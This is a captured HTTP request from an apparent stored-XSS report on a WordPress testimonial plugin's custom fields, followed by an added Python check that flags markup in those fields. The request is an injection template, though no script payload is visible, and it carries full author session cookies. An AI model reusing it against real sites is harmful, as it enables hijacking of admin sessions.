POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=176&action=edit
X-WP-Nonce: c12330b50c
Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286
Origin: http://example.com
Content-Length: 2729
DNT: 1
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wpnonce"

c627da8fa4
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/post.php?post=176&action=edit
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="user_ID"

3
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="action"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="originalaction"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_type"

testimonial
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="original_post_status"

publish
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="referredby"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_original_http_referer"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_ID"

176
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="meta-box-order-nonce"

e78bbacfea
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="closedpostboxesnonce"

cb99c6138d
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="samplepermalinknonce"

97e0ac6960
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="my-custom-fields_wpnonce"

f842632466
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_client"


-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_email"

test@gmail.com
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_position"


-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_other"


-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_rating"


-----------------------------1097171016543246544154165286--

#XSS TRIGGER POINT:
When an admin or authenticated user loads the contents of all testimonials.
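
A defensive check for the request shown above, added here as an example and not part of the original write-up: it parses a multipart/form-data edit-post body and flags `_ikcf_*` custom fields whose values contain markup. The page does not say which field carries the payload, so treating all five as plain-text fields is an assumption, as are the function names, the regex heuristic and the constructed sample values.

```python
import re
from email import message_from_bytes

# Field names copied from the request above. Treating them as plain-text
# fields that should never hold markup is an assumption of this example.
PLAIN_TEXT_FIELDS = {"_ikcf_client", "_ikcf_email", "_ikcf_position",
                     "_ikcf_other", "_ikcf_rating"}
# Heuristic only: an HTML tag opener or an inline event-handler attribute.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=", re.IGNORECASE)

BOUNDARY = "----constructed-boundary"  # constructed, not the page's boundary


def build_body(fields):
    """Build a constructed multipart/form-data body for offline testing."""
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"'
             f"\r\n\r\n{v}\r\n" for k, v in fields.items()]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()


def parse_form(content_type, body):
    """Parse a multipart/form-data body into {field name: value}."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    if not msg.is_multipart():
        return {}
    fields = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        if name is not None:
            value = part.get_payload(decode=True) or b""
            fields[name] = value.decode("utf-8", "replace")
    return fields


def suspicious_fields(fields):
    """Return the names of plain-text custom fields whose value has markup."""
    return sorted(name for name, value in fields.items()
                  if name in PLAIN_TEXT_FIELDS and MARKUP.search(value))


if __name__ == "__main__":
    ctype = f"multipart/form-data; boundary={BOUNDARY}"
    sample = build_body({"post_ID": "176", "_ikcf_email": "test@gmail.com",
                         "_ikcf_client": "<b>Acme</b>"})  # constructed values
    print(suspicious_fields(parse_form(ctype, sample)))
```

A request-side check like this is only a detection backstop; stored XSS is fixed where the testimonial fields are written into the page, by escaping them on output.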